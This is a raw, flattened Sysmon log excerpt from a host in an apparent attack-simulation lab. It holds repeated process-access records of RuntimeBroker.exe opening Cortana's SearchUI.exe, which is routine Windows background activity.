13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011700Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011699Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011698Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011697Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011696Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011695Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011694Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011693Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011692Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011691Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011690Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011689Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011688Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011687Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011686Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011685Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011684Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011683Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011682Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 